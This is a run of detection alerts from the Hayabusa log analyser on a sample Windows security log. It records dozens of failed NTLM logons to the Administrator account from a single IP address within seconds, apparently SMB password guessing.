2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
